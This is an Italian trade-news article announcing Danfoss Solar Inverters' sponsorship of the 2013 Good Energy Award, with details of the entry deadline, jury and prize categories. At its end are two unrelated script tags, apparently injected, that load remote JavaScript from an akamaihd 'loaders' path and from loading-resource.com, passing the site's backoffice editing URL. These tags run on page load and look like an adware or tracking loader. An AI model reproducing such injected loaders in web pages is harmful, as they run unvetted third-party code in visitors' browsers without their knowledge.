1. Home
  2. Notizie e Mercato
  3. Danfoss Solar Inverters tra gli sponsor del Good Energy Award 2013

Danfoss Solar Inverters tra gli sponsor del Good Energy Award 2013

Energie rinnovabili di
Al via la quarta edizione dell’iniziativa ideata e promossa da Bernoni Grant Thornton. Tra gli sponsor quest’anno ci sarà anche Danfoss Solar Inverters


Il 30 aprile si chiuderanno le iscrizioni al Good Energy Award 2013, dando il via ufficiale alla quarta edizione del Premio ideato e promosso dallo Studio Bernoni Grant Thornton, rinomato tax, legal e financial advisor che, avvalendosi di 30.000 professionisti altamente qualificati, fornisce ai propri Clienti una gamma completa ed integrata di Servizi di Consulenza personalizzati e di alta qualità.

Dal 2009  il Good Energy Award è un appuntamento ormai consolidato che conta ogni anno su centinaia di imprese candidate. Nato e voluto per alzare la soglia di attenzione e mettere in “sana” competizione le imprese italiane che hanno avuto l’intelligenza e la capacità di investire in progetti  di risparmio energetico, il premio è riservato anche a realtà operanti nella produzione di energia da fonti rinnovabili e ad imprese specializzate nella costruzione di impianti dedicati a questo specifico comparto.

Dopo aver preso parte al Good Energy Award nelle precedenti edizioni in qualità di concorrente, quest’anno Danfoss Solar Inverters contribuirà all’iniziativa come sponsor, insieme ad altre aziende di alto livello operanti nel settore dell’energia.

Danfoss segue da diversi anni il Good Energy Award – spiega l’ing. Lorenzo Colombo, Country Manager Italia di Danfoss Solar Inverters – per dimostrare il nostro apprezzamento per la professionalità dell’organizzazione e dei metodi di valutazione, abbiamo deciso di sostenere l’edizione del 2013 in qualità di sponsor”.
 
Una Giuria indipendente , costituita da noti esponenti del panorama economico-finanziario, imprenditoriale e istituzionale  italiano, avrà il compito di valutare le candidature (libere e gratuite) al fine di pervenire alla nomina di un vincitore in ognuna delle tre categorie degli operatori: Producer, Trader, Energy Efficiency.

La Giuria si riunirà a fine maggio presso la sede dell’Ordine dei Dottori Commercialisti di Milano, mentre la premiazione è prevista ai primi di giugno 2013 sempre a Milano. Il premio consisterà in un'onorificenza di carattere simbolico, che funga da riconoscimento delle capacità imprenditoriali del vincitore e dei finalisti.


<script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script><script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script>